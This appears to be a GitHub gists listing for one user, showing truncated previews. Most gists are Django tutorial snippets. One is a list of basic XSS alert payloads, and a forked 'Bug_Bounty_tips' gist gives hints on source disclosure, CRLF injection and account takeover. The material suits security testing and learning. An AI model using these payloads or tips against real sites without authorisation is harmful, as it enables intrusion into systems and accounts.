Xifeng2009
/ XSS: Payload
Created
January 9, 2019 06:03
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script>alert(123);</script> | |
| <ScRipT>alert("XSS");</ScRipT> | |
| <script>alert(123)</script> | |
| <script>alert("hellox worldss");</script> | |
| <script>alert(“XSS”)</script> | |
| <script>alert(“XSS”);</script> | |
| <script>alert(‘XSS’)</script> | |
| “><script>alert(“XSS”)</script> | |
| <script>alert(/XSS”)</script> | |
| <script>alert(/XSS/)</script> |
Xifeng2009
/ Base of MTV
Created
April 9, 2019 01:41
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # In project/urls.py | |
| from django.conf.urls import url, include | |
| urlpatterns = [ | |
| url(r'', include('main.urls', namespace='main')), | |
| ] | |
| # In app/urls.py | |
| from django.conf.urls import url | |
| from . import views |
Xifeng2009
/ Base2 of MTV: ORM
Created
April 9, 2019 02:55
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # In settings.py | |
| DATABASES = { | |
| 'default': { | |
| 'ENGINE': 'django.db.backends.mysql', | |
| 'NAME': 'mysql', | |
| 'USER': 'root', | |
| 'PASSWORD': 'YOUR PASSWORD', | |
| 'HOST': '127.0.0.1', | |
| 'PORT': '3306', | |
| } |
Xifeng2009
/ Base3 of MTV: Foreign Key
Created
April 9, 2019 05:16
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # In models.py | |
| class Comment(models.Model): | |
| topic = models.ForeignKey(Topic) | |
| comment = models.CharField(max_length=200, null=True, blank=True, verbose_name='评论') | |
| date_added = models.DateTimeField(auto_now_add=True, verbose_name='创建时间') | |
| class Meta: | |
| verbose_name_plural = 'comments' | |
| def __str__(self): | |
| return self.comment[:10] | |
Xifeng2009
/ Base4 of MTV: POST
Created
April 9, 2019 05:41
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # In app/forms.py | |
| from django import forms | |
| from .models import Topic | |
| class TopicForm(forms.ModelForm): | |
| class Meta: | |
| model = Topic | |
| fields = ['title', 'text'] | |
| labels = { | |
| 'title': 'Title: ', | |
| 'text': 'Text: ', |
Xifeng2009
/ Ajax
Created
April 9, 2019 06:07
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # In app/views.py | |
| import random | |
| from django.http import JsonResponse | |
| def ajax_1(request): | |
| context = {"data": random.randint(1, 999)} | |
| return JsonResponse(context) | |
| # In templates | |
| <input id="a1" value="AAA"> | |
| <button id="b1" class="button">Click!</button> |
Xifeng2009
/ Bug_Bounty_tips
Created
July 24, 2022 07:14
— forked from BugHunter001/Bug_Bounty_tips
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| site.com/file.php | |
| response = nothing | |
| http://site.com/file.php~ | |
| response = source | |
| ------------------------------------- | |
| https://github.com/kleiton0x00/CRLF-one-liner | |
| ------------------------------------------ | |
| try to add admin as your user, | |
| change his email to yours, |
Xifeng2009
/ gist:d3041b0e5134fb9c778ca26c54eaf5cf
Created
October 26, 2023 08:01
Recursively Read Filenames in Dir
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| for path, _, filenames in os.walk(os.path.expanduser(nuclei_templates_path)): | |
| for filename in filenames: | |
| print(os.path.join(path, filename)) |
OlderNewer